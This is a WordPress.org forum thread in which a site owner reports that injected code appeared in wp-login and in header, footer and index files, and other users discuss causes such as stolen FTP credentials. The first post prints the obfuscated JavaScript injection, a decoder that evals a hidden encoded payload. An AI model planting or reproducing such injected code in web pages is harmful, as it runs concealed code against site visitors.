WordPress.org

Forums

2.5.1 hacked? (4 posts)

  1. mikejandreau
    Member
    Posted 6 years ago #

    Looks like at around 8:48AM this morning, someone got into my WordPress installs (all 11 of them, in my account), and managed to add code to wp-login:

    script language=JavaScript>function hmlyban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,52,34,14,32,57,59,46,0,
    0,0,0,0,0,13,28,60,23,2,39,5,61,44,29,26,53,25,12,22,10,6,8,7,51,35,54,9,27,
    30,18,42,0,0,0,0,20,0,45,31,4,15,33,55,62,36,3,58,38,24,41,50,43,0,21,17,56,
    16,40,19,48,1,47,49);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);
    i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCo
    i>de(1
    55^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}hmlyban('H2bG0vd8K4g8j098uWOybvbGg
    S2u0vdg9Wy0K0XaHE9By80HBXZBGE9gU809KoyGgWjZjfJZu92jmTym7508yyXu3Y2Zo2d0uCoBK
    fdG3g5ahn2HNo08SCWj38XG0doKj0gBKk9gK0dGUdoHzkZZ4njunD2yoZbom4OywnW98n9B00gBk
    4OZu98Bg2d0S09maUj9u09sf8ym7gyBuygGj2XuKvbGgEWmEYoBGE9gU8bmBO2')</script

    Anyone know of any vulnerabilities? My directories were changed to 715 (I think my host did that) this morning, as well.

    Anyone know what's going on? I deleted the code, and uploaded a clean copy, and am checking the rest of my directories for stuff changed this morning, as well.

  2. mikejandreau
    Member
    Posted 6 years ago #

    They managed to hit files that weren't 775 or 777, mostly every header, footer, and index file in every directory in every domain.

    My host has been less than responsive (ignoring chats, and hanging up on me when I call)

    Anyone have any ideas?

  3. My host has been less than responsive (ignoring chats, and hanging up on me when I call)

    Anyone have any ideas?

    Switch hosts.

  4. dualtech
    Member
    Posted 6 years ago #

    I've seen almost exactly the same JS code inserted into HTML and PHP files for WP and non-WP sites. We are pretty sure ours was the result of a compromised client computer with cached FTP usernames and passwords.

    For each FTP account that was compromised the function name, the string passed to it, and the numeric array were different. In our case, they inserted the script at the opening and closing body tags of any documents that contained them.

Topic Closed

This topic has been closed to new replies.

About this Topic